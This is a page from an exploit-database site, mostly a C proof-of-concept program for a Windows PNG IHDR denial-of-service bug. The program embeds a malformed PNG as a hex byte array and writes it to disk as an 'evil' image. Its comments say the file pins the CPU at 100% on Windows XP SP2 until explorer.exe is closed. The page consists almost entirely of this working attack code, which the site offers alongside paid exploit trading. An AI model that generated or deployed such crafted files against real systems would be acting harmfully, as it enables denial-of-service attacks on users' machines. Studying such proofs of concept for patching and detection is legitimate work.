0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c)
================================================================ MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) ================================================================ /* ################################################################################## #Microsoft Windows PNG IHDR block DoS poc #More info: http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=6 #Written by Preddy # #don't create the poc png file on windows it won't work as it should #when i create it on windows with activeperl or visual c it doesn't work !!??!! #you can try if you want to..it didn't work for me because of some weird magical windows reason.. #the png header becomes: 89 50 4e 47 0d 0d #instead of : 89 50 4e 47 0d 0a # #I currently have no single idea WHY it does that... #so use linux to compile/run the script or the program # #http://www.team-rootshell.com # #Greetz to all of my friends at: # #FREENODE(irc.freenode.net): ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor #MILW0RM(ABS.lcirc.net): #milw0rm #STS(irc.smashthestack.org): #lecture,#social (special greetz to: esper and crystal <3<3<3) #PTP(irc.eu.pulltheplug.org): #aso,#Social #GSO(gso.eclipticx.net): #gso-chat #TTNET(irc.ttnet.net.tr):#coders,#linux,#nukedx,#zion,#php #SSTNET(irc.0x557.net):#darpa,#exploits,#m00,#ph4nt0m,#rx.rx,#segfault,#sscan #xoron,sakkkure :D #Rootshell Security Group and everyone else ^^ # #This causes 100% cpu tested on WinXp Sp2 #Cpu will keep running at 100% untill you close explorer.exe # ################################################################################## */ #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc,char **argv) { char *evilpng="billy.png"; FILE * winpng; char png[] = { 0x89,0x50,0x4e,0x47,0x0d,0x0a,0x1a,0x0a,0x00,0x00,0x00,0x0d,0x49,0x48,0x44,0x52, 0x00,0x00,0xff,0xff,0x00,0x00,0xff,0xff,0x08,0x00,0x00,0x00,0x00,0xc3,0x07,0xf1, 0x5c,0x00,0x00,0x00,0x07,0x74,0x49,0x4d,0x45,0x07,0xd6,0x02,0x0e,0x0f,0x25,0x12, 0x82,0xba,0x97,0x53,0x00,0x00,0x00,0x09,0x70,0x48,0x59,0x73,0x00,0x00,0x0a,0xf0, 0x00,0x00,0x0a,0xf0,0x01,0x42,0xac,0x34,0x98,0x00,0x00,0x00,0x04,0x67,0x41,0x4d, 0x41,0x00,0x00,0xb1,0x8f,0x0b,0xfc,0x61,0x05,0x00,0x00,0x09,0x4d,0x49,0x44,0x41, 0x54,0x78,0xda,0xcd,0x9d,0x41,0x6c,0x1b,0x45,0x14,0x40,0x27,0xff,0x00,0x00,0x00, 0xff,0x00,0xff,0x00,0x00,0x00,0x00,0xff,0xff,0x00,0xff,0x00,0xff,0xff,0xff,0xff, 0xff,0xc8,0xa8,0xbd,0x94,0x0a,0xc9,0x2d,0x1c,0x20,0x70,0x71,0x7a,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x00,0x4d,0x0e,0x75,0x55,0x55, 0x4a,0x72,0x31,0x6a,0x39,0xd8,0x85,0x83,0x5b,0x09,0xd2,0x14,0x55,0xc8,0x2b,0xa1, 0x26,0x15,0x48,0xd8,0x16,0x12,0x69,0x00,0x01,0x2a,0x62,0x59,0xef,0x7a,0xd7,0x5e, 0x7b,0x76,0xfe,0xff,0x33,0x63,0x36,0xff,0x14,0x7b,0xff,0xee,0x3e,0xff,0x99,0xff, 0xe7,0xcf,0xcc,0xdf,0xcd,0x98,0xcd,0x02,0xf9,0xe7,0xc7,0xdf,0xd8,0x36,0x91,0xc7, 0x8c,0x9d,0xbd,0x0f,0xc1,0x9f,0xf6,0xf7,0xe5,0xef,0xbe,0xf9,0x3d,0x6e,0xb6,0x80, 0xf1,0xe9,0x97,0x5e,0x7d,0x22,0xf8,0x64,0xbb,0xf2,0xc7,0xd7,0xef,0x3c,0xa1,0x70, 0xc9,0x11,0xc8,0xd8,0xfe,0x53,0x77,0x1e,0x78,0x70,0x1e,0xe3,0x0f,0x47,0x1f,0x8d, 0x9b,0x89,0x23,0x8f,0xbf,0xbb,0xd5,0x63,0xfc,0xe1,0x85,0xb8,0x71,0xf8,0xb2,0xe3, 0xe4,0x96,0xcf,0xb8,0x5d,0x11,0x7d,0x48,0x87,0xf1,0xef,0xd7,0xe3,0x46,0x11,0x40, 0xce,0x7b,0x8c,0xd5,0xed,0xd8,0x17,0x7d,0xd9,0xff,0x73,0x87,0xf1,0xdf,0xb7,0xa3, 0x8e,0x1b,0x99,0xb8,0x09,0x9d,0xd8,0x78,0xb1,0xc3,0x78,0x27,0x32,0xe8,0x64,0xec, 0x7a,0x36,0x6e,0x46,0x36,0x75,0xdf,0x61,0xfc,0x30,0xf2,0x70,0xc6,0xe9,0x0b,0x8d, 0x9c,0x11,0x2f,0xe3,0xae,0xaa,0xcd,0xfe,0x8c,0x76,0xea,0x8c,0x1b,0x9d,0xe2,0xb6, 0x65,0xc1,0x66,0x5b,0x07,0x22,0x8f,0x26,0xbd,0x30,0x6f,0x57,0x92,0x71,0x32,0xbe, 0xf0,0xa7,0x88,0xd1,0xb4,0x7d,0x29,0x9a,0xf1,0x31,0x1e,0xd8,0x7a,0x08,0xa5,0x37, 0x7b,0x3d,0x3f,0xaa,0x6e,0x99,0x2c,0xe4,0x40,0x1d,0x81,0x1d,0x59,0xd3,0xee,0x49, 0x63,0x24,0xdd,0x32,0x5b,0x6f,0xda,0x15,0xb1,0xca,0x81,0x2d,0x34,0xa3,0xd3,0x2d, 0xb5,0x37,0x78,0xb6,0xee,0x3a,0xa5,0x12,0x63,0x23,0xc4,0x68,0x37,0x0b,0x5a,0x1b, 0x3c,0x59,0xee,0xb6,0x90,0x12,0x63,0xd9,0x1e,0x90,0xba,0x46,0x0f,0xcf,0xfb,0xad, 0xd4,0x10,0xff,0x72,0xc0,0x67,0x36,0x07,0xbf,0x48,0xdd,0x28,0x6a,0x32,0xa5,0x59, 0x39,0x93,0xe8,0xfe,0xb9,0x17,0x54,0x16,0xd9,0x31,0x6b,0x0f,0x4b,0x43,0x8b,0x29, 0x33,0x7d,0xdd,0xa8,0x29,0xee,0xe7,0x80,0x1d,0xef,0xf1,0x0c,0xb0,0x92,0x57,0x47, 0xcc,0x5d,0x25,0xf9,0x9f,0xc8,0x8e,0x46,0xc3,0xe6,0x49,0x59,0xb1,0xbd,0x8d,0x62, 0xd8,0x15,0x95,0xec,0xd8,0xae,0x72,0xbf,0x3e,0xf1,0x95,0x5a,0xd2,0x76,0x6e,0x96, 0xa6,0x2f,0x1e,0x67,0xd6,0xf8,0x5f,0x9b,0x8b,0x2a,0xed,0x5d,0x3e,0x41,0x3d,0x43, 0xd4,0xd6,0xcc,0x68,0xda,0x11,0x52,0x91,0x6d,0x6f,0x63,0x28,0xa0,0xa9,0xb5,0x35, 0x6b,0xaf,0x46,0x1d,0x39,0x2c,0xdb,0xde,0xe7,0xc8,0x56,0x04,0xda,0x9a,0x95,0x22, 0x8f,0x98,0x8b,0x70,0x2e,0xc0,0x91,0x02,0x1d,0x11,0x68,0xeb,0xc1,0x21,0x5b,0xd9, 0xbf,0x73,0x9c,0xcb,0x28,0xb6,0x35,0x63,0x4b,0x82,0x63,0x27,0x56,0xa8,0xf1,0x3c, 0xf3,0x81,0x84,0x15,0x41,0x3b,0x9a,0x22,0x43,0xda,0x4d,0x5a,0xa7,0xe4,0xc7,0x5b, 0x65,0x3b,0x5a,0xab,0xa2,0xa3,0x89,0xab,0xa4,0x20,0x54,0xe2,0xd3,0xfc,0xaa,0x68, 0x47,0x96,0x14,0x1a,0xd2,0x99,0x46,0xe0,0x3b,0x65,0x9e,0x7f,0x05,0x30,0xef,0x01, 0x19,0x87,0x13,0x34,0x59,0xcf,0x89,0xea,0x36,0x6a,0xf9,0xa3,0xf0,0xd2,0x81,0xd4, 0x91,0x90,0x75,0x5b,0x92,0x11,0x9e,0x73,0x59,0x17,0x00,0x85,0xd4,0x0a,0x2a,0x89, 0xc9,0xa5,0x22,0x0e,0x80,0xdd,0x11,0xb6,0x63,0x54,0xf6,0xd3,0x6f,0x09,0x04,0x64, 0xf4,0x55,0xca,0xea,0x76,0x64,0xed,0x37,0x5b,0x80,0x86,0x79,0x1d,0x0e,0x94,0x73, 0x91,0xbf,0x63,0x03,0x3a,0x15,0x33,0xbf,0xbe,0x39,0x0f,0x69,0x24,0x3e,0x87,0x20, 0xcd,0xb7,0x22,0x0f,0x6d,0x02,0xa7,0xa2,0x18,0xd9,0xd9,0x4b,0x90,0x86,0xb9,0x02, 0x44,0xf3,0xf7,0x12,0x91,0x87,0x40,0x46,0x44,0x7f,0xec,0x48,0x05,0xea,0x92,0xc0, 0x90,0x63,0x08,0xce,0x04,0x7e,0x1d,0x76,0x2d,0x85,0xcd,0x59,0x90,0x46,0x62,0x51, 0x74,0xaf,0x39,0xc1,0xb1,0x7b,0x0c,0x12,0x9c,0x1d,0x83,0x35,0x34,0x39,0x4b,0x0a, 0x43,0x03,0x70,0x67,0xb4,0x1d,0xd9,0xcd,0xe3,0xa0,0x4a,0xe2,0x6a,0x24,0x64,0x5a, 0x10,0x9c,0xa0,0xa0,0x81,0xf4,0x99,0x8e,0x5c,0x3e,0x05,0xeb,0x2c,0x46,0xad,0x5b, 0x1d,0x12,0x9c,0xb4,0xae,0x8f,0x91,0x9d,0x3d,0x0f,0xaa,0x24,0x3e,0xe6,0x87,0x20, 0x23,0x2d,0x38,0x09,0x1e,0x66,0xf0,0x8c,0xec,0xe4,0x17,0x30,0x24,0x7f,0x58,0x1c, 0x4f,0x09,0xce,0xb9,0xad,0x93,0x91,0xcd,0xc8,0x42,0xee,0x13,0x9d,0xb2,0xa1,0x95, 0xb1,0x3d,0x73,0x03,0xd4,0x31,0x79,0x90,0xd3,0xa2,0x33,0x74,0xf6,0xc7,0x0e,0xe4, 0x51,0x30,0x4c,0x32,0xb3,0x34,0x9c,0xaa,0x1d,0x14,0x9d,0x00,0x87,0x47,0x12,0xa3, 0x03,0x09,0x5b,0x32,0x35,0x0c,0xf9,0x94,0x40,0xdd,0xd2,0xea,0x33,0xee,0x15,0x11, 0xcd,0x7d,0xf8,0xdc,0xe0,0x37,0xa2,0x15,0xc6,0x5f,0xdb,0xba,0x19,0x99,0x75,0x14, 0x76,0x9c,0x13,0xc5,0xf0,0x67,0x23,0x21,0x50,0x5e,0x63,0xa0,0x50,0x19,0x1d,0xc7, 0x01,0x93,0x20,0x36,0x1b,0x5e,0xc2,0x98,0x10,0xe9,0x6e,0x8c,0x80,0x91,0xb5,0x5f, 0x83,0x47,0x9c,0x0f,0x42,0xa3,0xe2,0x1e,0x91,0xea,0xad,0x51,0x30,0x3a,0x23,0xce, 0xcb,0x90,0x7b,0x27,0x16,0xfb,0x23,0x90,0xc8,0x8e,0x2d,0xd8,0xad,0xa5,0x18,0xd9, 0x35,0xb0,0x53,0x26,0x4a,0xc8,0x4b,0xad,0xc3,0xd1,0x4c,0x8e,0x91,0x59,0x47,0x4e, 0x01,0xe9,0x4a,0xaa,0x88,0xbb,0x52,0x0d,0xa1,0x23,0xc7,0xe8,0xb4,0x37,0x64,0xca, 0x3e,0xbf,0x11,0x85,0x9e,0x65,0xcc,0xcd,0x90,0x39,0x2e,0x47,0x72,0xe2,0x39,0x6d, 0x33,0xc8,0x81,0x8a,0xd1,0x4a,0x0d,0xf8,0x36,0xf8,0x1c,0x97,0x23,0x0b,0xcf,0x0b, 0x1b,0x3c,0xf1,0x91,0x3f,0xde,0x08,0xec,0x08,0xad,0x2f,0xa8,0xda,0x91,0x75,0x76, 0x31,0x44,0x0b,0x2d,0x7e,0x97,0x8c,0x5e,0x31,0x6a,0x22,0x16,0x0f,0x30,0xeb,0x3d, 0x62,0x49,0x8a,0x96,0xac,0xba,0x5d,0x32,0x7a,0x52,0x59,0x41,0xdc,0x41,0x9d,0xd1, 0xa1,0x8c,0x46,0xe8,0x76,0xc9,0x68,0x05,0xcc,0x12,0xab,0x0e,0x46,0xc6,0x32,0x91, 0x10,0xde,0xd2,0x62,0xe4,0x61,0x8c,0x19,0x35,0x31,0x0a,0x28,0xcb,0x42,0x46,0xd4, 0x72,0xba,0x2e,0xc6,0x68,0xca,0x9c,0x80,0x11,0x17,0xe6,0xf5,0x31,0x3a,0x94,0x65, 0x9e,0x8f,0x77,0x3c,0x37,0xc2,0xad,0x1a,0xb8,0xb5,0x55,0x9d,0x8c,0x8e,0xf7,0xf0, 0x22,0x51,0x25,0x92,0x11,0x59,0x44,0xa2,0x97,0xd1,0x99,0xcc,0x14,0x9a,0x1c,0x14, 0x7e,0x5b,0x23,0x07,0x74,0xed,0x8c,0x4e,0x54,0xcf,0x0f,0x8e,0x90,0x8d,0x3c,0x37, 0xce,0x23,0x5b,0x5a,0x71,0x2c,0xe4,0x22,0x4e,0xac,0x5f,0x18,0x18,0x20,0xcd,0x33, 0xbc,0xa9,0x42,0xeb,0x4d,0x78,0x1e,0xe3,0xcb,0x4e,0xb4,0x26,0x48,0x37,0xf9,0x64, 0x7a,0x7c,0x6f,0x02,0xa9,0xfe,0xfe,0x4d,0xfc,0xa5,0xb5,0x30,0x1a,0x93,0xd3,0x07, 0x9f,0xc1,0xd2,0xb9,0x72,0x6a,0x81,0xa0,0xac,0xce,0x68,0xa6,0xd3,0xd3,0x24,0x3e, 0x47,0xce,0x9f,0x25,0xa9,0x2b,0xfa,0x4c,0xa6,0x02,0x6d,0x31,0x29,0xb8,0xb4,0x2b, 0x8a,0x7e,0x6d,0xe4,0xea,0x74,0x40,0xea,0xbe,0xb7,0x1a,0x63,0x0e,0xdc,0x5c,0x52, 0xb7,0xa2,0x1a,0x63,0x46,0x8e,0xb0,0x49,0x2d,0x69,0x91,0x67,0x34,0x8a,0x52,0x84, 0x41,0xde,0x4b,0x61,0x94,0xf4,0xeb,0xe4,0x47,0x29,0xb9,0x13,0xd9,0x93,0x12,0xe7, 0x48,0xd9,0x31,0x23,0xe1,0xcc,0xbe,0xfc,0x4f,0x6d,0x9d,0x53,0x40,0xb4,0x9b,0xc4, 0xa2,0x59,0x39,0xc6,0x9c,0x02,0xa1,0x8d,0x9b,0x0c,0x86,0x18,0x25,0x72,0x8a,0x2c, 0xbc,0x09,0x22,0x94,0x44,0x89,0x58,0x17,0x44,0xf7,0x99,0xcc,0xc7,0xe1,0xcf,0xd6, 0xad,0x8d,0xbd,0x93,0x24,0x0f,0x4a,0xcd,0x9d,0xa6,0xdd,0x92,0xda,0xd6,0x03,0x5b, 0x7f,0x4d,0xef,0x79,0x86,0x2c,0xad,0x87,0x52,0xca,0x82,0x24,0xfa,0x63,0x38,0xa9, 0x0e,0xf6,0x31,0x4d,0xd2,0xa8,0x58,0x27,0xdc,0x90,0xce,0x38,0x50,0xa3,0xd3,0x1b, 0xd7,0x10,0x1b,0xb3,0x7d,0x42,0x88,0xe4,0x64,0xc6,0xc1,0x42,0x9a,0xbe,0x38,0x02, 0x6f,0xc3,0xf7,0x09,0x7a,0xa6,0x20,0xe1,0xd7,0xf3,0x03,0x99,0x62,0x5f,0x9d,0xc1, 0x75,0xd2,0x6f,0x3d,0x46,0x50,0xa6,0x31,0x66,0x0e,0x0f,0x7c,0x31,0x41,0x3a,0xbd, 0x4f,0x66,0x08,0xf1,0x87,0xc6,0xf8,0xde,0xd0,0xad,0x7a,0x7f,0x4e,0x92,0xae,0x94, 0xa2,0xa8,0x53,0xfa,0x63,0x66,0xb8,0x63,0x05,0xa3,0x2f,0xcd,0x67,0xc0,0xca,0xa3, 0x9e,0x10,0x7d,0x86,0xb7,0xe0,0xd0,0x7d,0xb0,0x26,0x49,0xcd,0x26,0x9b,0xf8,0xf9, 0x35,0x65,0x9c,0x31,0x78,0x7b,0xbc,0x67,0x5e,0x59,0xae,0xb1,0x7d,0xd3,0xc7,0xa8, 0xd3,0xae,0xc4,0xe4,0x35,0xac,0x2a,0x85,0x31,0xcd,0xe5,0x48,0x49,0x66,0x92,0xd3, 0x68,0x46,0x8a,0xcf,0x4c,0x13,0x74,0x61,0xc1,0x47,0x1f,0x0a,0xe3,0x3e,0x82,0x2e, 0x2c,0x7b,0xd1,0x29,0x1a,0x85,0xf1,0x19,0xad,0x8c,0x89,0x83,0x58,0x4d,0x0a,0x23, 0xd5,0x2d,0x00,0x19,0x1f,0x05,0xa3,0x66,0x49,0x8f,0x82,0x11,0xae,0xba,0x22,0xc9, 0x1e,0xac,0x22,0x85,0x71,0x95,0xa0,0x8b,0x90,0x71,0x6c,0x14,0xa7,0x30,0x22,0xb6, 0xc3,0x49,0x8c,0x58,0x45,0x0a,0x63,0x95,0xa0,0xab,0x53,0x28,0x8c,0x35,0xcd,0x1d, 0x72,0x14,0x8c,0x6d,0xdc,0x4e,0x2e,0x56,0xe0,0xe7,0x0a,0x25,0x18,0x59,0x29,0x1e, 0x43,0x92,0x18,0x2d,0xb0,0x08,0x9b,0x22,0x70,0x3d,0xb3,0x0c,0x23,0x3b,0x0b,0x57, 0x72,0x8d,0x40,0x88,0xe3,0xcc,0x4c,0x1c,0xad,0x4d,0xad,0x89,0x7b,0x43,0x1f,0x24, 0xa2,0x1a,0x4e,0x8a,0x91,0x5d,0xd3,0x07,0xb9,0x81,0x55,0x24,0xe7,0x14,0xd7,0xde, 0x40,0x54,0x36,0xa1,0x64,0x44,0x3e,0xe3,0x42,0x22,0xaa,0x0b,0x51,0xb2,0x31,0x3a, 0x46,0x66,0xcd,0x9c,0xd1,0xd2,0xde,0x70,0x21,0xae,0x3c,0x23,0x6b,0x9f,0xd6,0x61, 0x4a,0x4c,0xc5,0x9e,0x3c,0x23,0x63,0x37,0x8f,0xcc,0x2a,0xf7,0xca,0xcd,0x91,0xda, 0xb1,0x23,0x0b,0xcf,0xcf,0x2a,0x36,0x38,0x3a,0xf4,0xc8,0xcf,0x15,0xda,0x0b,0x07, 0x66,0x95,0x46,0x9d,0x1a,0x5a,0x53,0x61,0x3e,0xd3,0x5e,0x78,0xf6,0xe5,0x4b,0xf2, 0xc6,0x44,0x14,0xb9,0xfa,0xa2,0xb8,0x37,0x6c,0xe4,0xca,0x92,0x9b,0x35,0xf8,0xf5, 0x1e,0x0d,0x35,0x1f,0x46,0x56,0x06,0x13,0x51,0xf9,0xa8,0x91,0xb1,0x83,0x49,0xdf, 0xc7,0x46,0xef,0x10,0x6b,0xab,0x4b,0xa1,0xaf,0xe7,0x12,0x26,0x47,0x7a,0x18,0xd3, 0xe4,0x25,0x8c,0x56,0xed,0xff,0x66,0xa4,0xac,0xc0,0x7b,0xb2,0x8a,0x2f,0xef,0xd1, 0xc4,0x78,0x88,0x7c,0x46,0x89,0xa0,0xab,0x85,0xd1,0x44,0x4f,0xf1,0x7c,0x39,0x7f, 0x99,0xa0,0xac,0xad,0x4e,0x8a,0x22,0xd6,0x12,0x69,0x53,0x73,0x64,0x8c,0x37,0x58, 0xc4,0x1a,0xb4,0x55,0x5d,0x5a,0x23,0x74,0xc6,0x91,0x31,0x5a,0x4b,0x25,0x2b,0xc9, 0x1b,0xcd,0xad,0x6a,0x89,0x50,0x68,0x36,0x3a,0xc6,0x56,0x75,0xa9,0xc6,0x35,0x14, 0xdd,0x82,0x1a,0x19,0xad,0xf5,0x5e,0x7c,0x6c,0x5d,0x28,0x79,0xa9,0xe5,0xc0,0xf2, 0xa2,0x63,0xc1,0x75,0x19,0x40,0x35,0xc6,0x0c,0x0b,0xac,0xb2,0xdc,0xed,0x7b,0xad, 0xd5,0x52,0x60,0xc2,0xbe,0xa1,0xa7,0xb5,0xb9,0xb4,0x4c,0x6f,0xe2,0x9e,0xc8,0x8f, 0xd7,0x0d,0xbb,0xe1,0xbf,0x3d,0xce,0x7b,0xeb,0x5d,0xa3,0xe0,0x16,0x53,0x9b,0x59, 0xf7,0xdb,0x82,0xbf,0xa1,0x55,0xc9,0x2b,0xbd,0x82,0x4a,0x29,0xa7,0xe8,0x24,0x3b, 0x3e,0x65,0xd1,0xb6,0xeb,0x5e,0xd5,0x42,0xa7,0xbc,0x39,0x1b,0x30,0x36,0x8a,0xca, 0xef,0x66,0x54,0x61,0xec,0x3e,0x9a,0xee,0x15,0x54,0x18,0x79,0x77,0xb7,0xc5,0xf4, 0xaa,0x71,0xdd,0x8d,0x4e,0x33,0x97,0x4d,0x0e,0xf1,0x19,0x66,0x26,0x5f,0xac,0xd7, 0x29,0x65,0x71,0xca,0x76,0x74,0x6d,0xe5,0x17,0x03,0x04,0xb5,0xd7,0x5c,0x04,0xc3, 0xcc,0x16,0x2a,0x8d,0xae,0x06,0xa1,0xe8,0x43,0x83,0x1d,0x3b,0x52,0xcf,0x84,0x6b, 0x21,0x87,0xf6,0x7d,0x8d,0x64,0x3e,0xc0,0x73,0x85,0x54,0x4f,0xa1,0x25,0xf6,0xa4, 0xae,0xb6,0xd6,0x27,0xfa,0xd2,0xb3,0x50,0xd8,0xe1,0x16,0xeb,0xd6,0x28,0x97,0x97, 0x67,0x0c,0x05,0xbb,0x44,0x08,0x22,0x78,0xbe,0xd5,0x98,0x3c,0x34,0xc5,0x29,0x26, 0x6e,0xcd,0x93,0x66,0xe7,0x0a,0x76,0xb4,0x22,0x37,0x25,0xbd,0x03,0xc6,0x5c,0x7a, 0x82,0x93,0xfb,0x5a,0xb7,0x6a,0x35,0xda,0x02,0xc2,0x68,0xc6,0x6b,0xc3,0x31,0xb2, 0xb1,0x32,0x98,0x54,0xb4,0x36,0xef,0xde,0xae,0xde,0xa3,0x2f,0x70,0x28,0x30,0x0a, 0x1e,0x4a,0x9e,0x70,0x18,0xc7,0x43,0x73,0x1c,0xeb,0xee,0xed,0x5b,0xb7,0xf1,0x4b, 0x13,0xba,0x18,0xd7,0xfa,0xed,0xd4,0x0a,0xed,0xca,0xee,0xe9,0xff,0x09,0x2a,0x78, 0xca,0x8c,0x01,0xdf,0x92,0x93,0x70,0x19,0xe9,0xb9,0x1e,0x73,0x27,0x2f,0x6f,0x57, 0xa7,0x37,0xef,0xde,0x5b,0x5b,0x97,0x4a,0x75,0xc2,0x22,0x1f,0xc3,0xbb,0xaf,0xa6, 0xad,0xfb,0xa3,0x9d,0xd1,0x7b,0xc0,0xc3,0xab,0xa8,0xd1,0xf3,0x3a,0x4b,0xa5,0x71, 0xc6,0x9d,0xf8,0xd7,0xfb,0x47,0x8c,0xa4,0x1f,0xc6,0x0b,0x5a,0xe8,0x34,0x30,0xb2, 0x6c,0xb3,0x3c,0x90,0xd1,0xf8,0x15,0xd9,0x3a,0x19,0x8f,0x3d,0x60,0x0f,0xe8,0x73, 0xe3,0x1e,0xd2,0xf0,0x57,0x5e,0x39,0xb1,0x4e,0xc6,0x4f,0x6d,0x66,0x7f,0x36,0xa6, 0xf1,0x82,0xdd,0x47,0x22,0x35,0x32,0x8e,0x7f,0xeb,0x30,0xfe,0xb4,0x5f,0x2b,0xa3, 0x9b,0x4b,0x4a,0xbd,0xd2,0x90,0x2f,0xc7,0xff,0xee,0xbc,0x2b,0x1e,0xf1,0x42,0x19, 0x9a,0x64,0xb1,0x6f,0x3c,0x43,0xc8,0xae,0x2f,0xdd,0xf7,0xd9,0xdf,0xd9,0x66,0xff, 0xfd,0x21,0x24,0x53,0xf7,0x5d,0xc6,0x7f,0x4f,0xef,0x88,0x9b,0x24,0x52,0x76,0x5f, 0xb1,0xbd,0xff,0xaf,0xb0,0x75,0x72,0xbb,0x42,0xee,0xfe,0xe4,0x9f,0x2e,0xe3,0xb6, 0x85,0xf4,0x10,0xbb,0xff,0xef,0x63,0x6b,0x7e,0x7f,0x2c,0x8b,0x53,0x42,0x79,0x78, 0xea,0x8a,0x8b,0xd8,0x65,0xb4,0xed,0x9f,0x2f,0x4e,0xed,0x8a,0x1b,0x2a,0x24,0xe3, 0xc7,0x97,0xef,0x77,0xd9,0xc6,0x82,0x57,0x77,0x6d,0xad,0xde,0xf8,0xf2,0x97,0xb8, 0xc9,0x7c,0xd9,0xf7,0xdc,0x8b,0x4f,0x3f,0xec,0x7f,0x18,0xeb,0x7f,0xbd,0xd8,0x5f, 0x0f,0xe2,0x66,0xf3,0xe5,0x91,0xfe,0xae,0xf7,0x1f,0x3a,0x53,0xb1,0x09,0xdd,0xaf, 0x0e,0xba,0x00,0x00,0x00,0x00,0x49,0x45,0x4e,0x44,0xae,0x42,0x60,0x82,0x00 }; winpng = fopen(evilpng,"w"); fwrite(&png,sizeof(png),1,winpng); fclose(winpng); printf("Evil PNG Created\nCya around,\nPreddy\n"); } # 0day.today [2024-12-24] #